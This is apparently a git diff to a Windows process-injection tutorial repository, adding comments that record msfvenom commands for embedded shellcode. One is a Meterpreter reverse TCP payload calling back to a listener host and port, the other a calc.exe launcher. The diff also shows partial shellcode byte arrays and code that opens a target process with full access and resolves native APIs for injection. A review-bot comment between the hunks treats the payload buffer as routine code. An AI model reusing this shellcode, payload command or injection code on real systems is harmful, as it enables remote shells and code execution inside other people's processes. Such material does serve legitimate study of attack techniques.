diff --git a/3-shellcode-injection/main.cpp b/3-shellcode-injection/main.cpp
index f91a714..7d045e5 100644
--- a/3-shellcode-injection/main.cpp
+++ b/3-shellcode-injection/main.cpp
@@ -5,6 +5,7 @@
 #define log_err(msg, ...) printf("[-] " msg "\n", ##__VA_ARGS__)
 #define log_ok(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__)
+// msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=172.24.224.1 LPORT=12345 -f c --var-name=g_shellcode
 char g_shellcode[] =
 "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
 "\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52"
@@ -52,7 +53,7 @@ int main(int argc, char **argv) {
 DWORD pid = atoi(argv[1]);
 log_info("Opening process with pid %ld", pid);
-
+
 HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid);
 if (process == NULL) {
 log_err("Failed to open process: %ld", GetLastError());
diff --git a/7-native-api/main.cpp b/7-native-api/main.cpp
index 0b4c684..383be78 100644
--- a/7-native-api/main.cpp
+++ b/7-native-api/main.cpp
@@ -8,6 +8,7 @@
 #define log_err(msg, ...) log("[-] " msg, ##__VA_ARGS__)
 #define log_ok(msg, ...) log("[+] " msg, ##__VA_ARGS__)
+// msfvenom --platform windows --arch x64 -p windows/x64/exec cmd=calc.exe -f c --var-name=g_shellcode
 unsigned char g_shellcode[] =
 "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
 "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
@@ -51,7 +52,7 @@ int main(int argc, char **argv) {
 NtWaitForSingleObject nt_wait_for_single_object = NULL;
 // Grab NT API functions
- {
+ {
 HMODULE ntdll_module = GetModuleHandleA("Ntdll");
 if (ntdll_module == NULL) {
 log_err("Failed get Ntdll.dll: %ld", GetLastError());
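Review bot: The new comment in 3-shellcode-injection/main.cpp sits above `char g_shellcode[]`, a buffer of raw bytes declared with plain `char`, whose signedness is implementation-defined, while the parallel declaration in 7-native-api/main.cpp in this same commit uses `unsigned char`; the two files should agree, and `unsigned char` states that the contents are opaque bytes rather than text. Suggested line: `unsigned char g_shellcode[] =`. The array's initializer and every use of `g_shellcode` continue past the hunk, so any call that passes it where a `char *` is expected is outside this view and may need a matching cast.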
@@ -87,16 +88,16 @@ int main(int argc, char **argv) {
 log_err("Failed get NtWriteVirtualMemory: %ld", GetLastError());
 goto cleanup;
 }
-
+
 nt_wait_for_single_object = (NtWaitForSingleObject)GetProcAddress(ntdll_module, "NtWaitForSingleObject");
 if (nt_wait_for_single_object == NULL) {
 log_err("Failed get NtWaitForSingleObject: %ld", GetLastError());
 goto cleanup;
 }
 }
-
+
 // OpenProcess()
- {
+ {
 OBJECT_ATTRIBUTES OA = { sizeof(OA), NULL };
 CLIENT_ID CID = { (HANDLE)pid, NULL };